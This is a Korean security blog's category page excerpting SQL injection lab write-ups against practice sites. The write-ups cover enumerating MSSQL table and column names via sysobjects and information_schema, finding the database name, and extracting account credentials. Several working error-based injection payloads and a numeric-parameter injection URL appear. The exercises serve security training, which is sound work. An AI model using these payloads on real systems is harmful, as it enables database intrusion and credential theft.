| 일 | 월 | 화 | 수 | 목 | 금 | 토 |
|---|---|---|---|---|---|---|
| 1 | 2 | 3 | 4 | 5 | 6 | |
| 7 | 8 | 9 | 10 | 11 | 12 | 13 |
| 14 | 15 | 16 | 17 | 18 | 19 | 20 |
| 21 | 22 | 23 | 24 | 25 | 26 | 27 |
| 28 | 29 | 30 | 31 |
- stored procedure
- Web Authentication
- IDS
- DHCP
- VPN
- VPC
- UTM
- docker
- WAF
- csrf
- arp
- Blind SQL Injection
- ncloud
- XSS
- Websec
- SQL
- AWS
- sql injection
- NETSEC
- Router Firewall
- Mass SQL Injection
- Vlan
- RDS
- Web
- HSRP
- snmp
- 보안 솔루션
- Linux
- Database Scheme
- wireshark
- Today
- Total
목록Database Scheme (7)
yuil :: SecOps
기본 쿼리문select column_name from information_schema.columnswhere table_name='member' [WebSec] Database Scheme Lab 02web hacking practice 사이트의 table name을 알아낸 방법을 응용해 member table의 column명을 모두 찾으세요.(3가지 방법을 모두 이용할 것.) 1. column 이름을 하나씩 제거하면서 알아냄2. column 이름과 비교연산yu-il.tistory.com [WebSec] Database Scheme Lab 03camel 사이트 대상 database schema 파악하기- table명 찾기- 찾은 table 중 회원 정보가 들어 있는 table의 column 명 찾기..
camel 사이트 대상 database schema 파악하기- table명 찾기- 찾은 table 중 회원 정보가 들어 있는 table의 column 명 찾기- 위에서 찾은 정보로 계정 정보(id, password) 알아내기 1. table명 찾기'or (select top 1 name from (select top 1 name from sysobjects where xtype='u' order by name) as vtable order by name desc)>0--쭉 시도..'or (select top 1 name from (select top 18 name from sysobjects where xtype='u' order by name) as vtable order by name desc)>0-..
web hacking practice 사이트의 table name을 알아낸 방법을 응용해 member table의 column명을 모두 찾으세요.(3가지 방법을 모두 이용할 것.) 1. column 이름을 하나씩 제거하면서 알아냄2. column 이름과 비교연산을 통해 하나씩 차례대로 알아냄3. Top 구문을 이용하여 검색결과를 하나씩 늘리면서 정렬 / 역정렬을 통해 알아냄기본 쿼리문select column_name from information_schema.columnswhere table_name='member' 1. 하나씩 제거하며 column 이름 알아내기select top 1 column_name from information_schema.columnswhere table_name='member..
table 이름 알아내기Table명을 포함한 시스템 테이블sysobjectsinformation_schema.tablesinformation_schema.columns모든 테이블의 이름을 알아내기 위한 방법- 알아낸 Table이름을 하나씩 제거하면서 알아냄- 알아낸 Table 이름과 비교연산을 통해 하나씩 차례대로 알아냄- Top 구문을 이용하여 검색결과를 하나씩 늘리면서 정렬 / 역정렬을 통해 알아냄select * from sysobjectsselect name from sysobjects where xtype='u'select name from camel.dbo.sysobjects where xtype='u'select name from camel..sysobjects where xtype='u' /..
web hacking practice 사이트의 모든 injection vector에 '(따옴표), ;, -- 가 필터링 된다.database 이름을 알아내세요.[hint] 숫자를 입력받는 파라미터가 인젝션 백터인 경우 따옴표 없이도 공격이 가능하다.camel 사이트도 db 이름 확인하기# 기존 사용 형태' or db_name()>1-- xpwiresharkhttp://192.168.65.20/board/board_view.asp?num=5 win2kboard_view.aspSql="Select * from board Where strNumber = " & strNumber해당 페이지 소스를 보면 파라미터 값에 따옴표가 필요없다 = 데이터가 숫자형태이기 때문 xpand db_name()>1--http://..
